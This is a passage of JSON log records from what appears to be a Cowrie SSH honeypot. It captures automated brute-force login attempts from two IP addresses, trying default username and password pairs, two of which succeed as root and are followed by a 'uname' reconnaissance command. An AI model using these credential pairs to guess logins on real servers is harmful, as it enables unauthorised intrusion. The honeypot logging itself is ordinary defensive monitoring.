0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:26:43.852095Z","src_ip":"212.227.125.160","session":"48ce2b1bf89f"}
{"eventid":"cowrie.login.failed","username":"hiddify-cli","password":"hiddify-cli","message":"login attempt [hiddify-cli/hiddify-cli] failed","sensor":"my-vps","timestamp":"2025-08-26T11:26:44.254358Z","src_ip":"212.227.125.160","session":"48ce2b1bf89f"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:44.271378Z","src_ip":"196.251.86.249","session":"245573c707c5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:45.334585Z","src_ip":"212.227.125.160","session":"48ce2b1bf89f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33426,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e0783b76031","protocol":"ssh","message":"New connection: 212.227.125.160:33426 (1.2.3.4:22) [session: 3e0783b76031]","sensor":"my-vps","timestamp":"2025-08-26T11:26:49.523982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:26:49.525392Z","src_ip":"212.227.125.160","session":"3e0783b76031"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:26:49.580336Z","src_ip":"212.227.125.160","session":"3e0783b76031"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"vagrant","message":"login attempt [vagrant/vagrant] failed","sensor":"my-vps","timestamp":"2025-08-26T11:26:49.779367Z","src_ip":"212.227.125.160","session":"3e0783b76031"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:51.023912Z","src_ip":"212.227.125.160","session":"3e0783b76031"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34196,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4dda32edc4d","protocol":"ssh","message":"New connection: 212.227.125.160:34196 (1.2.3.4:22) [session: e4dda32edc4d]","sensor":"my-vps","timestamp":"2025-08-26T11:26:55.272900Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:26:55.273997Z","src_ip":"212.227.125.160","session":"e4dda32edc4d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:26:55.333721Z","src_ip":"212.227.125.160","session":"e4dda32edc4d"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1","message":"login attempt [root/Password1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:26:55.541583Z","src_ip":"212.227.125.160","session":"e4dda32edc4d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:26:55.709989Z","src_ip":"212.227.125.160","session":"e4dda32edc4d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:26:55.710831Z","src_ip":"212.227.125.160","session":"e4dda32edc4d"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":33210,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6e36195abc6","protocol":"ssh","message":"New connection: 83.168.105.65:33210 (1.2.3.4:22) [session: e6e36195abc6]","sensor":"my-vps","timestamp":"2025-08-26T11:26:55.712976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:26:55.713710Z","src_ip":"83.168.105.65","session":"e6e36195abc6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:26:55.754271Z","src_ip":"83.168.105.65","session":"e6e36195abc6"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234qwer","message":"login attempt [test/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-26T11:26:55.877143Z","src_ip":"83.168.105.65","session":"e6e36195abc6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:56.061029Z","src_ip":"212.227.125.160","session":"e4dda32edc4d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:56.062088Z","src_ip":"212.227.125.160","session":"e4dda32edc4d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:26:56.919676Z","src_ip":"83.168.105.65","session":"e6e36195abc6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34962,"dst_ip":"1.2.3.4","dst_port":22,"session":"74b8af475755","protocol":"ssh","message":"New connection: 212.227.125.160:34962 (1.2.3.4:22) [session: 74b8af475755]","sensor":"my-vps","timestamp":"2025-08-26T11:27:01.408792Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:27:01.492988Z","src_ip":"212.227.125.160","session":"74b8af475755"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:27:01.493893Z","src_ip":"212.227.125.160","session":"74b8af475755"}
{"eventid":"cowrie.login.failed","username":"grml","password":"grml","message":"login attempt [grml/grml] failed","sensor":"my-vps","timestamp":"2025-08-26T11:27:01.755441Z","src_ip":"212.227.125.160","session":"74b8af475755"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:27:02.820581Z","src_ip":"212.227.125.160","session":"74b8af475755"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35736,"dst_ip":"1.2.3.4","dst_port":22,"session":"a07ee550beba","protocol":"ssh","message":"New connection: 212.227.125.160:35736 (1.2.3.4:22) [session: a07ee550beba]","sensor":"my-vps","timestamp":"2025-08-26T11:27:07.016120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:27:07.017512Z","src_ip":"212.227.125.160","session":"a07ee550beba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:27:07.083254Z","src_ip":"212.227.125.160","session":"a07ee550beba"}
{"eventid":"cowrie.login.failed","username":"user50","password":"user50","message":"login attempt [user50/user50] failed","sensor":"my-vps","timestamp":"2025-08-26T11:27:07.247062Z","src_ip":"212.227.125.160","session":"a07ee550beba"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:27:08.349261Z","src_ip":"212.227.125.160","session":"a07ee550beba"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":40372,"dst_ip":"1.2.3.4","dst_port":22,"session":"d904d46fd256","protocol":"ssh","message":"New connection: 83.168.105.65:40372 (1.2.3.4:22) [session: d904d46fd256]","sensor":"my-vps","timestamp":"2025-08-26T11:27:10.979765Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:27:10.980655Z","src_ip":"83.168.105.65","session":"d904d46fd256"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:27:11.016240Z","src_ip":"83.168.105.65","session":"d904d46fd256"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:27:11.133686Z","src_ip":"83.168.105.65","session":"d904d46fd256"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:27:11.233830Z","src_ip":"83.168.105.65","session":"d904d46fd256"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:27:11.234761Z","src_ip":"83.168.105.65","session":"d904d46fd256"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:27:11.272013Z","src_ip":"83.168.105.65","session":"d904d46fd256"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:27:11.273084Z","src_ip":"83.168.105.65","session":"d904d46fd256"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36502,"dst_ip":"1.2.3.4","dst_port":22,"session":"67a4ac233e92","protocol":"ssh","message":"New connection: 212.227.125.160:36502 (1.2.3.4:22) [session: 67a4ac233e92]","sensor":"my-vps","timestamp":"2025-08-26T11:27:13.229218Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:27:13.243558Z","src_ip":"212.227.125.160","session":"67a4ac233e92"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:27:13.302069Z","src_ip":"212.227.125.160","session":"67a4ac233e92"}
{"eventid":"cowrie.login.failed","username":"almalinux","password":"almalinux","message":"login attempt [almalinux/almalinux] failed","sensor":"my-vps","timestamp":"2025-08-26T11:27:13.600986Z","src_ip":"212.227.125.160","session":"67a4ac233e92"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:27:14.687651Z","src_ip":"212.227.125.160","session":"67a4ac233e92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37272,"dst_ip":"1.2.3.4","dst_port":22,"session":"26303ab14d16","protocol":"ssh","message":"New connection: 212.227.125.160:37272 (1.2.3.4:22) [session: 26303ab14d16]","sensor":"my-vps","timestamp":"2025-08-26T11:27:19.912487Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:27:19.952607Z","src_ip":"212.227.125.160","session":"26303ab14d16"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:27:19.994579Z","src_ip":"212.227.125.160","session":"26303ab14d16"}
{"eventid":"cowrie.login.failed","username":"nova","password":"nova","message":"login attempt [nova/nova] failed","sensor":"my-vps","timestamp":"2025-08-26T11:27:20.359410Z","src_ip":"212.227.125.160","session":"26303ab14d16"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:27:21.420993Z","src_ip":"212.227.125.160","session":"26303ab14d16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38042,"dst_ip":"1.2.3.4","dst_port":22,"session":"32ff605544d7","protocol":"ssh","message":"New connection: 212.227.125.160:38042 (1.2.3.4:22) [session: 32ff605544d7]","sensor":"my-vps","timestamp":"2025-08-26T11:27:25.523710Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:27:26.114965Z","src_ip":"212.227.125.160","session":"32ff605544d7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:27:26.115708Z","src_ip":"212.227.125.160","session":"32ff605544d7"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":51670,"dst_ip":"1.2.3.4","dst_port":22,"session":"40d3c7ed3ec0","protocol":"ssh","message":"New connection: 83.168.105.65:51670 (1.2.3.4:22) [session: 40d3c7ed3ec0]","sensor":"my-vps","timestamp":"2025-08-26T11:27:26.344834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:27:26.346550Z","src_ip":"83.168.105.65","session":"40d3c7ed3ec0"}
